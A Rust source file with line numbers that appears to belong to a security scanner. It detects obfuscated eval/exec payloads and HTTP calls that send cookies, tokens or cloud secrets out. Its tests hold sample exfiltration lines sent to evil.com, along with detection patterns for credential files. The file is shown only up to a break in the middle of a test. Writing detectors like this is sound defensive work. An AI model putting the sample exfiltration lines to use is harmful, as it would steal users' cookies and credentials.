1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::rules::shared::SENSITIVE_KEY_VARS;
5use crate::script_analysis::detect_interpreter;
6use crate::verdict::{Evidence, Finding, RuleId, Severity};
7
8const CODE_EXTENSIONS: &[&str] = &[
10 "js", "mjs", "cjs", "ts", "mts", "jsx", "tsx", "py", "pyw", "sh", "bash", "zsh", "fish", "ps1",
11 "psm1", "rb", "php", "pl",
12];
13
14pub fn is_code_file(path: Option<&str>, content: &str) -> bool {
16 if let Some(p) = path {
17 let lower = p.to_lowercase();
18 if let Some(ext) = lower.rsplit('.').next() {
19 if CODE_EXTENSIONS.contains(&ext) {
20 return true;
21 }
22 }
23 }
24 if content.starts_with("#!") {
26 let interp = detect_interpreter(content);
27 if !interp.is_empty() {
28 return true;
29 }
30 }
31 false
32}
33
34pub fn check(input: &str, file_path: Option<&str>) -> Vec<Finding> {
36 let mut findings = Vec::new();
37
38 check_dynamic_code_execution(input, &mut findings);
39 check_obfuscated_payload(input, &mut findings);
40 check_suspicious_code_exfiltration(input, file_path, &mut findings);
41
42 findings
43}
44
45static DYNAMIC_CODE_PAIRS: Lazy<Vec<(Regex, Regex, &'static str)>> = Lazy::new(|| {
48 vec![
49 (
51 Regex::new(r"eval\s*\(").unwrap(),
52 Regex::new(r"atob\s*\(").unwrap(),
53 "eval() near atob()",
54 ),
55 (
57 Regex::new(r"eval\s*\(").unwrap(),
58 Regex::new(r"String\.fromCharCode").unwrap(),
59 "eval() near String.fromCharCode()",
60 ),
61 (
63 Regex::new(r"new\s+Function\s*\(").unwrap(),
64 Regex::new(r"(?:atob|String\.fromCharCode|Buffer\.from)\s*\(").unwrap(),
65 "new Function() near encoded content",
66 ),
67 (
69 Regex::new(r"exec\s*\(").unwrap(),
70 Regex::new(r"b(?:ase)?64[._]?b?64decode|b64decode").unwrap(),
71 "exec() near b64decode()",
72 ),
73 (
75 Regex::new(r"exec\s*\(\s*compile\s*\(").unwrap(),
76 Regex::new(r"compile\s*\(").unwrap(),
77 "exec(compile())",
78 ),
79 (
81 Regex::new(r"exec\s*\(\s*__import__\s*\(").unwrap(),
82 Regex::new(r"__import__\s*\(").unwrap(),
83 "exec(__import__())",
84 ),
85 ]
86});
87
88const PROXIMITY_WINDOW: usize = 500;
89
90fn check_dynamic_code_execution(input: &str, findings: &mut Vec<Finding>) {
91 for (pattern_a, pattern_b, description) in DYNAMIC_CODE_PAIRS.iter() {
92 for mat_a in pattern_a.find_iter(input) {
93 let start = safe_start(input, mat_a.start().saturating_sub(PROXIMITY_WINDOW));
97 let end = safe_end(input, mat_a.end() + PROXIMITY_WINDOW);
98 let window = &input[start..end];
99
100 if pattern_b.is_match(window) {
101 findings.push(Finding {
102 rule_id: RuleId::DynamicCodeExecution,
103 severity: Severity::Medium,
104 title: "Dynamic code execution with obfuscation".to_string(),
105 description: format!("Detected {description} in close proximity"),
106 evidence: vec![Evidence::CommandPattern {
107 pattern: description.to_string(),
108 matched: truncate(
109 &input[mat_a.start()..safe_end(input, mat_a.end() + 80)],
110 120,
111 ),
112 }],
113 human_view: None,
114 agent_view: None,
115 mitre_id: None,
116 custom_rule_id: None,
117 });
118 return;
119 }
120 }
121 }
122}
123
124static OBFUSCATED_DECODE_CALL: Lazy<Regex> = Lazy::new(|| {
125 Regex::new(
126 r#"(?:atob\s*\(\s*["']|b64decode\s*\(\s*b?["']|Buffer\.from\s*\(\s*["'])([A-Za-z0-9+/=]{40,})"#,
127 )
128 .unwrap()
129});
130
131static EXEC_EVAL_NEARBY: Lazy<Regex> =
132 Lazy::new(|| Regex::new(r"(?:eval|exec|Function)\s*\(").unwrap());
133
134fn check_obfuscated_payload(input: &str, findings: &mut Vec<Finding>) {
135 for cap in OBFUSCATED_DECODE_CALL.captures_iter(input) {
136 let full_match = cap.get(0).unwrap();
137 let start = safe_start(input, full_match.start().saturating_sub(PROXIMITY_WINDOW));
139 let end = safe_end(input, full_match.end() + PROXIMITY_WINDOW);
140 let window = &input[start..end];
141
142 if EXEC_EVAL_NEARBY.is_match(window) {
143 findings.push(Finding {
144 rule_id: RuleId::ObfuscatedPayload,
145 severity: Severity::Medium,
146 title: "Obfuscated payload with decode-execute".to_string(),
147 description:
148 "Long base64 string decoded and executed — likely obfuscated malicious payload"
149 .to_string(),
150 evidence: vec![Evidence::CommandPattern {
151 pattern: "base64 decode + eval/exec".to_string(),
152 matched: truncate(full_match.as_str(), 120),
153 }],
154 human_view: None,
155 agent_view: None,
156 mitre_id: None,
157 custom_rule_id: None,
158 });
159 return;
160 }
161 }
162}
163
164static JS_HTTP_CALL: Lazy<Regex> =
166 Lazy::new(|| Regex::new(r"(?:fetch\s*\(|axios\.\w+\s*\(|\.send\s*\()").unwrap());
167
168static PY_HTTP_CALL: Lazy<Regex> = Lazy::new(|| {
170 Regex::new(r"(?:requests\.(?:post|get|put)\s*\(|urllib\.request\.\w+\s*\()").unwrap()
171});
172
173static JS_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
175 let keys: Vec<String> = SENSITIVE_KEY_VARS
176 .iter()
177 .map(|k| regex::escape(k))
178 .collect();
179 Regex::new(&format!(
180 r"(?:document\.cookie|process\.env\.(?:{}))",
181 keys.join("|")
182 ))
183 .unwrap()
184});
185
186static PY_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
188 let keys: Vec<String> = SENSITIVE_KEY_VARS
189 .iter()
190 .map(|k| regex::escape(k))
191 .collect();
192 Regex::new(&format!(
193 r#"(?:os\.environ\[["'](?:{})["']\]|open\s*\(\s*["']/etc/(?:passwd|shadow)["'][^)]*\))"#,
194 keys.join("|")
195 ))
196 .unwrap()
197});
198
199static SEND_PROPS: Lazy<Regex> =
201 Lazy::new(|| Regex::new(r"(?i)(?:body|data|json|params|payload)\s*[:=]").unwrap());
202
203static GENERIC_PROP: Lazy<Regex> = Lazy::new(|| Regex::new(r"\b\w+\s*[:=]").unwrap());
206
207fn find_call_end(input: &[u8], open_pos: usize) -> Option<usize> {
215 let mut depth: u32 = 1;
216 let mut i = open_pos;
217 let mut in_string: Option<u8> = None;
218
219 while i < input.len() && depth > 0 {
220 let b = input[i];
221 match in_string {
222 Some(q) => {
223 if b == b'\\' && i + 1 < input.len() {
224 i += 2;
225 continue;
226 }
227 if b == q {
228 in_string = None;
229 }
230 }
231 None => {
232 if b == b'/' && i + 1 < input.len() && input[i + 1] == b'*' {
234 i += 2;
235 while i + 1 < input.len() {
236 if input[i] == b'*' && input[i + 1] == b'/' {
237 i += 2;
238 break;
239 }
240 i += 1;
241 }
242 continue;
243 }
244 if (b == b'/' && i + 1 < input.len() && input[i + 1] == b'/') || b == b'#' {
246 while i < input.len() && input[i] != b'\n' {
247 i += 1;
248 }
249 continue;
250 }
251 if b == b'/' {
254 let prev = {
255 let mut j = i;
256 while j > 0 && matches!(input[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
257 j -= 1;
258 }
259 if j > 0 {
260 input[j - 1]
261 } else {
262 0
263 }
264 };
265 let is_division = prev.is_ascii_alphanumeric()
266 || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
267 if !is_division {
268 i += 1;
269 while i < input.len() && input[i] != b'/' {
270 if input[i] == b'\\' && i + 1 < input.len() {
271 i += 1;
272 }
273 i += 1;
274 }
275 if i < input.len() {
276 i += 1;
277 }
278 continue;
279 }
280 }
281 match b {
282 b'"' | b'\'' | b'`' => in_string = Some(b),
283 b'(' | b'[' | b'{' => depth += 1,
284 b')' | b']' | b'}' => depth -= 1,
285 _ => {}
286 }
287 }
288 }
289 i += 1;
290 }
291 if depth == 0 {
292 Some(i)
293 } else {
294 None
295 }
296}
297
298fn check_suspicious_code_exfiltration(
299 input: &str,
300 file_path: Option<&str>,
301 findings: &mut Vec<Finding>,
302) {
303 let is_js = file_path
304 .map(|p| {
305 let lower = p.to_lowercase();
306 lower.ends_with(".js")
307 || lower.ends_with(".mjs")
308 || lower.ends_with(".cjs")
309 || lower.ends_with(".ts")
310 || lower.ends_with(".mts")
311 || lower.ends_with(".jsx")
312 || lower.ends_with(".tsx")
313 })
314 .unwrap_or(false);
315
316 let is_py = file_path
317 .map(|p| {
318 let lower = p.to_lowercase();
319 lower.ends_with(".py") || lower.ends_with(".pyw")
320 })
321 .unwrap_or(false);
322
323 let (is_js, is_py) = if !is_js && !is_py && file_path.is_some() {
325 let interp = detect_interpreter(input);
326 (
327 matches!(interp, "node" | "deno" | "bun"),
328 matches!(interp, "python" | "python3" | "python2"),
329 )
330 } else {
331 (is_js, is_py)
332 };
333
334 if is_js {
335 check_js_exfiltration(input, findings);
336 }
337 if is_py {
338 check_py_exfiltration(input, findings);
339 }
340}
341
342fn code_context_at(s: &[u8], pos: usize) -> (i32, bool) {
345 let mut depth: i32 = 0;
346 let mut in_string: Option<u8> = None;
347 let mut i = 0;
348
349 while i < s.len() {
350 if i == pos {
351 return (depth, in_string.is_none());
352 }
353 let b = s[i];
354 if let Some(q) = in_string {
355 if b == b'\\' && i + 1 < s.len() {
356 i += 2;
357 continue;
358 }
359 if b == q {
360 in_string = None;
361 }
362 i += 1;
363 continue;
364 }
365 if b == b'/' && i + 1 < s.len() && s[i + 1] == b'*' {
366 i += 2;
367 while i + 1 < s.len() {
368 if i == pos || i + 1 == pos {
369 return (depth, false);
370 }
371 if s[i] == b'*' && s[i + 1] == b'/' {
372 i += 2;
373 break;
374 }
375 i += 1;
376 }
377 continue;
378 }
379 if (b == b'/' && i + 1 < s.len() && s[i + 1] == b'/') || b == b'#' {
380 while i < s.len() && s[i] != b'\n' {
381 if i == pos {
382 return (depth, false);
383 }
384 i += 1;
385 }
386 continue;
387 }
388 if b == b'/' {
390 let prev = {
391 let mut j = i;
392 while j > 0 && matches!(s[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
393 j -= 1;
394 }
395 if j > 0 {
396 s[j - 1]
397 } else {
398 0
399 }
400 };
401 let is_division = prev.is_ascii_alphanumeric()
402 || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
403 if !is_division {
404 i += 1;
405 while i < s.len() && s[i] != b'/' {
406 if i == pos {
407 return (depth, false);
408 }
409 if s[i] == b'\\' && i + 1 < s.len() {
410 i += 1;
411 }
412 i += 1;
413 }
414 if i < s.len() {
415 if i == pos {
416 return (depth, false);
417 }
418 i += 1;
419 }
420 continue;
421 }
422 }
423 match b {
424 b'"' | b'\'' | b'`' => in_string = Some(b),
425 b'(' | b'[' | b'{' => depth += 1,
426 b')' | b']' | b'}' => depth -= 1,
427 _ => {}
428 }
429 i += 1;
430 }
431 (depth, in_string.is_none())
432}
433
434fn should_suppress_exfil(arg_span: &str, pos_in_span: usize) -> bool {
444 let before = &arg_span[..pos_in_span];
445 let bytes = before.as_bytes();
446
447 let nearest_prop = GENERIC_PROP
449 .find_iter(before)
450 .filter(|m| {
451 let (depth, is_code) = code_context_at(bytes, m.start());
452 depth <= 1 && is_code
453 })
454 .last();
455
456 match nearest_prop {
457 Some(m) => {
458 if SEND_PROPS.is_match(m.as_str()) {
459 return false;
460 }
461 true
463 }
464 None => false,
466 }
467}
468
469fn emit_exfil_finding(findings: &mut Vec<Finding>, call_snippet: &str, sens_str: &str) {
470 findings.push(Finding {
471 rule_id: RuleId::SuspiciousCodeExfiltration,
472 severity: Severity::Medium,
473 title: "Suspicious code exfiltration pattern".to_string(),
474 description: format!(
475 "HTTP call passes sensitive data '{}' as argument — potential data exfiltration",
476 sens_str
477 ),
478 evidence: vec![Evidence::CommandPattern {
479 pattern: "sensitive data inside HTTP call arguments".to_string(),
480 matched: truncate(call_snippet, 120),
481 }],
482 human_view: None,
483 agent_view: None,
484 mitre_id: None,
485 custom_rule_id: None,
486 });
487}
488
489fn check_js_exfiltration(input: &str, findings: &mut Vec<Finding>) {
490 let bytes = input.as_bytes();
491 for http_match in JS_HTTP_CALL.find_iter(input) {
492 let call_end = match find_call_end(bytes, http_match.end()) {
493 Some(end) => end,
494 None => continue,
495 };
496 let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
499 let arg_span = &input[http_match.end()..arg_end];
500
501 for sens_match in JS_SENSITIVE.find_iter(arg_span) {
502 if should_suppress_exfil(arg_span, sens_match.start()) {
503 continue;
504 }
505 let snippet_end = safe_end(input, call_end.min(input.len()));
506 let snippet = &input[http_match.start()..snippet_end];
507 emit_exfil_finding(findings, snippet, sens_match.as_str());
508 return;
509 }
510 }
511}
512
513fn check_py_exfiltration(input: &str, findings: &mut Vec<Finding>) {
514 let bytes = input.as_bytes();
515 for http_match in PY_HTTP_CALL.find_iter(input) {
516 let call_end = match find_call_end(bytes, http_match.end()) {
517 Some(end) => end,
518 None => continue,
519 };
520 let arg_end = safe_end(input, call_end.saturating_sub(1)).max(http_match.end());
522 let arg_span = &input[http_match.end()..arg_end];
523
524 for sens_match in PY_SENSITIVE.find_iter(arg_span) {
525 if should_suppress_exfil(arg_span, sens_match.start()) {
526 continue;
527 }
528 let snippet_end = safe_end(input, call_end.min(input.len()));
529 let snippet = &input[http_match.start()..snippet_end];
530 emit_exfil_finding(findings, snippet, sens_match.as_str());
531 return;
532 }
533 }
534}
535
536fn safe_end(s: &str, target: usize) -> usize {
538 let clamped = target.min(s.len());
539 let mut end = clamped;
540 while end > 0 && !s.is_char_boundary(end) {
541 end -= 1;
542 }
543 end
544}
545
546fn safe_start(s: &str, target: usize) -> usize {
550 let mut start = target.min(s.len());
551 while start < s.len() && !s.is_char_boundary(start) {
552 start += 1;
553 }
554 start
555}
556
557fn truncate(s: &str, max: usize) -> String {
558 if s.chars().count() <= max {
559 s.to_string()
560 } else {
561 let t: String = s.chars().take(max).collect();
562 format!("{t}...")
563 }
564}
565
566#[cfg(test)]
567mod tests {
568 use super::*;
569
570 #[test]
571 fn test_is_code_file_by_extension() {
572 assert!(is_code_file(Some("test.js"), ""));
573 assert!(is_code_file(Some("test.py"), ""));
574 assert!(is_code_file(Some("test.ts"), ""));
575 assert!(is_code_file(Some("test.sh"), ""));
576 assert!(is_code_file(Some("test.ps1"), ""));
577 assert!(!is_code_file(Some("notes.txt"), ""));
578 assert!(!is_code_file(Some("config.json"), ""));
579 }
580
581 #[test]
582 fn test_is_code_file_shebang() {
583 assert!(is_code_file(
584 Some("script"),
585 "#!/usr/bin/env python3\nimport os"
586 ));
587 assert!(is_code_file(Some("run"), "#!/bin/bash\necho hi"));
588 assert!(!is_code_file(Some("data"), "just some text"));
589 }
590
591 #[test]
592 fn test_dynamic_code_eval_atob() {
593 let input = r#"var x = eval(atob("SGVsbG8gV29ybGQ="));"#;
594 let findings = check(input, Some("test.js"));
595 assert!(
596 findings
597 .iter()
598 .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
599 "eval+atob should fire DynamicCodeExecution"
600 );
601 }
602
603 #[test]
604 fn test_dynamic_code_exec_b64decode() {
605 let input = r#"exec(b64decode("SGVsbG8gV29ybGQ="))"#;
606 let findings = check(input, Some("test.py"));
607 assert!(
608 findings
609 .iter()
610 .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
611 "exec+b64decode should fire DynamicCodeExecution"
612 );
613 }
614
615 #[test]
616 fn test_bare_eval_no_fire() {
617 let input = "eval(someVar);";
618 let findings = check(input, Some("test.js"));
619 assert!(
620 !findings
621 .iter()
622 .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
623 "bare eval should not fire"
624 );
625 }
626
627 #[test]
628 fn test_eval_atob_distant_no_fire() {
629 let padding = "x".repeat(600);
630 let input = format!("eval(something);\n{padding}\natob('SGVsbG8=');");
631 let findings = check(&input, Some("test.js"));
632 assert!(
633 !findings
634 .iter()
635 .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
636 "distant eval+atob should not fire"
637 );
638 }
639
640 #[test]
641 fn test_obfuscated_payload() {
642 let b64 = "A".repeat(50);
643 let input = format!(r#"eval(atob("{b64}"))"#);
644 let findings = check(&input, Some("test.js"));
645 assert!(
646 findings
647 .iter()
648 .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
649 "long base64 in atob near eval should fire ObfuscatedPayload"
650 );
651 }
652
653 #[test]
654 fn test_exfil_fetch_cookie() {
655 let input = r#"fetch("https://evil.com/?d=" + document.cookie)"#;
656 let findings = check(input, Some("test.js"));
657 assert!(
658 findings
659 .iter()
660 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
661 "fetch + document.cookie should fire"
662 );
663 }
664
665 #[test]
666 fn test_exfil_fetch_env_token() {
667 let input = r#"fetch(url, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
668 let findings = check(input, Some("test.js"));
669 assert!(
670 findings
671 .iter()
672 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
673 "fetch + process.env.GITHUB_TOKEN in body should fire"
674 );
675 }
676
677 #[test]
678 fn test_exfil_auth_header_no_fire() {
679 let input = r#"fetch("/api/login", {headers: {"Authorization": "Bearer " + process.env.GITHUB_TOKEN}})"#;
680 let findings = check(input, Some("test.js"));
681 assert!(
682 !findings
683 .iter()
684 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
685 "Authorization header pattern should NOT fire"
686 );
687 }
688
689 #[test]
690 fn test_exfil_python_requests() {
691 let input = r#"requests.post(url, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
692 let findings = check(input, Some("test.py"));
693 assert!(
694 findings
695 .iter()
696 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
697 "requests.post + secret env should fire"
698 );
699 }
700
701 #[test]
702 fn test_normal_fetch_no_fire() {
703 let input = r#"fetch("/api/data").then(r => r.json())"#;
704 let findings = check(input, Some("test.js"));
705 assert!(
706 !findings
707 .iter()
708 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
709 "normal fetch should not fire"
710 );
711 }
712
713 #[test]
714 fn test_not_code_file_no_fire() {
715 let input = r#"eval(atob("SGVsbG8gV29ybGQ="));"#;
716 assert!(!is_code_file(Some("notes.txt"), input));
717 }
718
719 #[test]
720 fn test_internal_post_body_no_fire() {
721 let input = r#"requests.post("https://internal-api.example.com/log", json={"event": "login", "user": username})"#;
722 let findings = check(input, Some("test.py"));
723 assert!(
724 !findings
725 .iter()
726 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
727 "internal API POST without sensitive data should not fire"
728 );
729 }
730
731 #[test]
732 fn test_exfil_js_meta_property_no_fire() {
733 let input = r#"fetch(url, {meta: process.env.GITHUB_TOKEN})"#;
734 let findings = check(input, Some("test.js"));
735 assert!(
736 !findings
737 .iter()
738 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
739 "secret in non-send property 'meta:' should NOT fire"
740 );
741 }
742
743 #[test]
744 fn test_exfil_python_meta_kwarg_no_fire() {
745 let input = r#"requests.post(url, meta=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
746 let findings = check(input, Some("test.py"));
747 assert!(
748 !findings
749 .iter()
750 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
751 "secret in non-send kwarg 'meta=' should NOT fire"
752 );
753 }
754
755 #[test]
756 fn test_exfil_js_token_property_no_fire() {
757 let input = r#"fetch(url, {token: process.env.GITHUB_TOKEN})"#;
758 let findings = check(input, Some("test.js"));
759 assert!(
760 !findings
761 .iter()
762 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
763 "secret in non-send property 'token:' should NOT fire"
764 );
765 }
766
767 #[test]
768 fn test_exfil_query_concat_fires() {
769 let input = r#"fetch("https://evil.com/c?token=" + process.env.GITHUB_TOKEN)"#;
770 let findings = check(input, Some("test.js"));
771 assert!(
772 findings
773 .iter()
774 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
775 "URL query concat with secret should fire"
776 );
777 }
778
779 #[test]
780 fn test_exfil_separate_statement_no_fire() {
781 let input = r#"fetch(url); const payload = { token: process.env.GITHUB_TOKEN };"#;
783 let findings = check(input, Some("test.js"));
784 assert!(
785 !findings
786 .iter()
787 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
788 "secret in separate statement (not in call args) should NOT fire"
789 );
790 }
791
792 #[test]
793 fn test_exfil_unrelated_body_object_no_fire() {
794 let input = r#"fetch(url); const opts = { body: bodyVar }; const token = process.env.GITHUB_TOKEN;"#;
796 let findings = check(input, Some("test.js"));
797 assert!(
798 !findings
799 .iter()
800 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
801 "unrelated body object near fetch should NOT fire"
802 );
803 }
804
805 #[test]
806 fn test_exfil_document_cookie_not_sent_no_fire() {
807 let input = r#"fetch(url); console.log(document.cookie);"#;
809 let findings = check(input, Some("test.js"));
810 assert!(
811 !findings
812 .iter()
813 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
814 "document.cookie outside call args should NOT fire"
815 );
816 }
817
818 #[test]
819 fn test_exfil_document_cookie_inside_call_fires() {
820 let input = r#"fetch("https://evil.com/?c=" + document.cookie)"#;
822 let findings = check(input, Some("test.js"));
823 assert!(
824 findings
825 .iter()
826 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
827 "document.cookie inside call args should fire"
828 );
829 }
830
831 #[test]
832 fn test_exfil_block_comment_in_args() {
833 let input =
835 r#"fetch(url /* ) */, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
836 let findings = check(input, Some("test.js"));
837 assert!(
838 findings
839 .iter()
840 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
841 "block comment with ) inside call args should not break parser"
842 );
843 }
844
845 #[test]
846 fn test_exfil_python_line_comment_in_args() {
847 let input = "requests.post(url, # )\n data=os.environ[\"AWS_SECRET_ACCESS_KEY\"])";
849 let findings = check(input, Some("test.py"));
850 assert!(
851 findings
852 .iter()
853 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
854 "Python # comment with ) inside call args should not break parser"
855 );
856 }
857
858 #[test]
859 fn test_exfil_js_regex_literal_in_args() {
860 let input = r#"fetch(url, {body: /\(/, json: process.env.GITHUB_TOKEN})"#;
862 let findings = check(input, Some("test.js"));
863 assert!(
864 findings
865 .iter()
866 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
867 "JS regex literal with ( should not break parser"
868 );
869 }
870
871 #[test]
872 fn test_find_call_end_block_comment() {
873 let input = b"url /* ) */, data)";
874 assert_eq!(find_call_end(input, 0), Some(18));
875 }
876
877 #[test]
878 fn test_find_call_end_line_comment() {
879 let input = b"url, # )\n data)";
880 assert_eq!(find_call_end(input, 0), Some(18));
881 }
882
883 #[test]
884 fn test_find_call_end_regex_literal() {
885 let input = br#"url, {body: /\(/, val})"#;
886 assert_eq!(find_call_end(input, 0), Some(23));
887 }
888
889 #[test]
890 fn test_exfil_headers_then_body_fires() {
891 let input = r#"fetch(url, {headers: {Authorization: auth}, body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
892 let findings = check(input, Some("test.js"));
893 assert!(
894 findings
895 .iter()
896 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
897 "secret in body after headers in same call should fire"
898 );
899 }
900
901 #[test]
902 fn test_exfil_python_headers_then_data_fires() {
903 let input =
904 r#"requests.post(url, headers=headers, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
905 let findings = check(input, Some("test.py"));
906 assert!(
907 findings
908 .iter()
909 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
910 "secret in data= after headers= in same call should fire"
911 );
912 }
913
914 #[test]
915 fn test_exfil_division_in_args_fires() {
916 let input = r#"fetch(url, {body: 1 / 2, json: process.env.GITHUB_TOKEN})"#;
917 let findings = check(input, Some("test.js"));
918 assert!(
919 findings
920 .iter()
921 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
922 "division operator in call args should not break parser"
923 );
924 }
925
926 #[test]
927 fn test_exfil_paren_division_in_args_fires() {
928 let input = r#"fetch(url, {body: (a / b), json: process.env.GITHUB_TOKEN})"#;
929 let findings = check(input, Some("test.js"));
930 assert!(
931 findings
932 .iter()
933 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
934 "parenthesized division in call args should not break parser"
935 );
936 }
937
938 #[test]
939 fn test_find_call_end_division() {
940 let input = b"url, {body: 1 / 2, val})";
941 assert_eq!(find_call_end(input, 0), Some(24));
942 }
943
944 #[test]
945 fn test_exfil_nested_headers_in_body_fires() {
946 let input = r#"fetch(url, {body: JSON.stringify({headers: "x", token: process.env.GITHUB_TOKEN})})"#;
947 let findings = check(input, Some("test.js"));
948 assert!(
949 findings
950 .iter()
951 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
952 "nested 'headers' key inside body payload should NOT suppress"
953 );
954 }
955
956 #[test]
957 fn test_exfil_python_nested_headers_in_data_fires() {
958 let input = r#"requests.post(url, data={"headers": "x", "token": os.environ["AWS_SECRET_ACCESS_KEY"]})"#;
959 let findings = check(input, Some("test.py"));
960 assert!(
961 findings
962 .iter()
963 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
964 "nested 'headers' key inside data= dict should NOT suppress"
965 );
966 }
967
968 #[test]
969 fn test_exfil_nested_headers_in_json_fires() {
970 let input = r#"fetch(url, {json: {headers: "x", token: process.env.GITHUB_TOKEN}})"#;
971 let findings = check(input, Some("test.js"));
972 assert!(
973 findings
974 .iter()
975 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
976 "nested 'headers' key inside json property should NOT suppress"
977 );
978 }
979
980 #[test]
981 fn test_exfil_python_hash_comment_headers_fires() {
982 let input = "requests.post(url, data={# headers: fake\n'token': os.environ[\"AWS_SECRET_ACCESS_KEY\"]})";
983 let findings = check(input, Some("test.py"));
984 assert!(
985 findings
986 .iter()
987 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
988 "# headers: inside comment must NOT suppress data= exfil"
989 );
990 }
991
992 #[test]
993 fn test_exfil_js_block_comment_headers_fires() {
994 let input =
995 r#"fetch(url, {/* headers: */ body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
996 let findings = check(input, Some("test.js"));
997 assert!(
998 findings
999 .iter()
1000 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1001 "/* headers: */ inside comment must NOT suppress body exfil"
1002 );
1003 }
1004
1005 #[test]
1006 fn test_exfil_regex_literal_headers_fires() {
1007 let input = r#"fetch(url, {body: /headers: \{/, json: process.env.GITHUB_TOKEN})"#;
1008 let findings = check(input, Some("test.js"));
1009 assert!(
1010 findings
1011 .iter()
1012 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1013 "/headers: .../ inside regex literal must NOT suppress"
1014 );
1015 }
1016
1017 #[test]
1018 fn test_exfil_regex_literal_authorization_fires() {
1019 let input = r#"fetch(url, {body: /Authorization: \[/, json: process.env.GITHUB_TOKEN})"#;
1020 let findings = check(input, Some("test.js"));
1021 assert!(
1022 findings
1023 .iter()
1024 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1025 "/Authorization: .../ inside regex literal must NOT suppress"
1026 );
1027 }
1028
1029 #[test]
1030 fn test_exfil_multiline_division_fires() {
1031 let input = "fetch(url, {body: 1\n/ 2, json: process.env.GITHUB_TOKEN})";
1032 let findings = check(input, Some("test.js"));
1033 assert!(
1034 findings
1035 .iter()
1036 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1037 "multiline division should not break parser"
1038 );
1039 }
1040
1041 #[test]
1042 fn test_exfil_multiline_paren_division_fires() {
1043 let input = "fetch(url, {body: (a\n/ b), json: process.env.GITHUB_TOKEN})";
1044 let findings = check(input, Some("test.js"));
1045 assert!(
1046 findings
1047 .iter()
1048 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1049 "parenthesized multiline division should not break parser"
1050 );
1051 }
1052
1053 #[test]
1054 fn test_find_call_end_multiline_division() {
1055 let input = b"url, {body: 1\n/ 2, val})";
1056 assert_eq!(find_call_end(input, 0), Some(24));
1057 }
1058
1059 #[test]
1060 fn test_exfil_postfix_increment_division_fires() {
1061 let input = r#"fetch(url, {body: a++ / 2, json: process.env.GITHUB_TOKEN})"#;
1062 let findings = check(input, Some("test.js"));
1063 assert!(
1064 findings
1065 .iter()
1066 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1067 "a++ / 2 should not break parser"
1068 );
1069 }
1070
1071 #[test]
1072 fn test_exfil_postfix_decrement_division_fires() {
1073 let input = r#"fetch(url, {body: a-- / 2, json: process.env.GITHUB_TOKEN})"#;
1074 let findings = check(input, Some("test.js"));
1075 assert!(
1076 findings
1077 .iter()
1078 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1079 "a-- / 2 should not break parser"
1080 );
1081 }
1082
1083 #[test]
1084 fn test_find_call_end_postfix_increment() {
1085 let input = b"url, {body: a++ / 2, val})";
1086 assert_eq!(find_call_end(input, 0), Some(26));
1087 }
1088
1089 #[test]
1090 fn test_find_call_end_postfix_decrement() {
1091 let input = b"url, {body: a-- / 2, val})";
1092 assert_eq!(find_call_end(input, 0), Some(26));
1093 }
1094
1095 #[test]
1096 fn test_exfil_postfix_inc_div_then_meta_no_fire() {
1097 let input = r#"fetch(url, {body: a++ / 2, meta: process.env.GITHUB_TOKEN})"#;
1098 let findings = check(input, Some("test.js"));
1099 assert!(
1100 !findings
1101 .iter()
1102 .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
1103 "secret in meta: after body: a++ / 2 should NOT fire"
1104 );
1105 }
1106
1107 #[test]
1108 fn test_exfil_postfix_dec_div_then_token_no_fire() {
1109 let input = r#"fetch(url, {body: a-- / 2, token: process.env.GITHUB_TOKEN})"#;
1110 let findings = check(input, Some("test.js"));
